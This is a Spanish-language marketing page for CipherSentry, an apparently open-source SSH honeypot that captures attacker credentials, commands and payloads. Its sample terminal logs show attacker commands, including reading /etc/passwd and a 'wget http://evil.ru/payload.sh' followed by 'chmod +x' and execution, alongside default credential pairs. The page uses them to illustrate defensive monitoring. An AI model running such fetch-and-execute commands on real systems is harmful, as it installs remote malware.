Visibilidad inmediata de cada sesión

Convierte cada
ataque en

CipherSentry despliega señuelos SSH que capturan a los atacantes, analiza sus técnicas y transforma cada intento de intrusión en inteligencia accionable.

Ver el producto Guía de inicio rápido →

Código abierto

GitHub · MIT License

Integración

Docker · 5 min setup

Compatibilidad

Linux · Docker · Cloud

Sesiones en vivo
datos reales del honeypot

honeypot@ciphersentry:~

root@honeypot:~# tail -f /var/log/honeypot.log

{"ts":"09:11:02","ip":"185.220.101.47","user":"admin","pass":"Admin123!","cmd":"uname -a"}

{"ts":"09:11:08","ip":"91.108.4.220","user":"root","pass":"toor","cmd":"cat /etc/passwd"}

{"ts":"09:11:15","ip":"45.33.32.156","user":"ubuntu","pass":"ubuntu","cmd":"wget http://185.x.x.x/bot.sh"}

{"ts":"09:11:21","ip":"192.241.200.12","user":"pi","pass":"raspberry","cmd":"crontab -e"}

ALERT Payload detectado · ELF x86_64 · sha256:a3f8...

root@honeypot:~# _

Muestra representativa de sesiones reales

⚠ Payload detectado
ELF · Botnet dropper

Características

Todo lo que necesitas para
conocer a tus atacantes

Desde la captura de credenciales hasta el análisis de payloads, CipherSentry recoge cada detalle de cada intento de intrusión.

Emulación SSH realista

Sistema Debian 12 completamente simulado con filesystem virtual, comandos reales y respuestas plausibles que engañan a atacantes sofisticados.

Captura de credenciales

Registra usuario, contraseña, versión del cliente SSH y método de autenticación. Alimenta tus reglas de bloqueo con datos reales.

Geolocalización en tiempo real

Cada IP atacante geoposicionada en mapa interactivo. Detecta campañas coordinadas, botnets distribuidas y patrones regionales.

Captura de payloads

Cada fichero que el atacante descarga se almacena y clasifica sin ejecutarse nunca. Analiza droppers ELF, scripts y binarios en un entorno seguro.

Dashboard analítico

Panel web con métricas del servidor, timeline de sesiones, análisis por IP, reconstrucción del terminal del atacante y exportación de informes.

API REST completa

Integra los datos del honeypot en tu SIEM, XDR o plataforma de threat intelligence. Autenticación por token, respuestas JSON estándar.

Producto estrella

SSH Honeypot de
nueva generación

No es un simple logger. CipherSentry simula un servidor Debian completo: filesystem con directorios reales, comandos con salidas plausibles, editores interactivos y compiladores que "ejecutan" sin correr código real.

Aislamiento por sesión — cada atacante tiene su propio VFS
Descarga y analiza payloads sin ejecutarlos nunca
Registra herramientas de reconocimiento, backdoors y mineros
Logs en formato JSONL — ingestión directa en Elastic/Splunk
Docker listo para producción en menos de 5 minutos

Ver toda la documentación →

session · 185.220.101.47

Last login: Thu Jun 11 08:42:11 2026 from 185.220.101.47

Debian GNU/Linux 12 (bookworm)

root@debian-prod:~# id

uid=0(root) gid=0(root) groups=0(root)

root@debian-prod:~# wget http://evil.ru/payload.sh

Connecting to evil.ru... connected.

HTTP request sent, awaiting response... 200 OK

Saving to: 'payload.sh' [4.2 KB]

root@debian-prod:~# chmod +x payload.sh && ./payload.sh

Segmentation fault (core dumped)

root@debian-prod:~# _

● Payload capturado y analizado ● Ejecución bloqueada

Comunidad

Únete a los primeros
en desplegarlo

CipherSentry está en fase early access. Buscamos equipos de seguridad que quieran capturar inteligencia real sobre atacantes y darnos feedback directo.

Los primeros equipos obtendrán acceso prioritario, soporte directo del equipo y precios de fundador.

Ver planes disponibles

Convierte cada ataque en

Todo lo que necesitas paraconocer a tus atacantes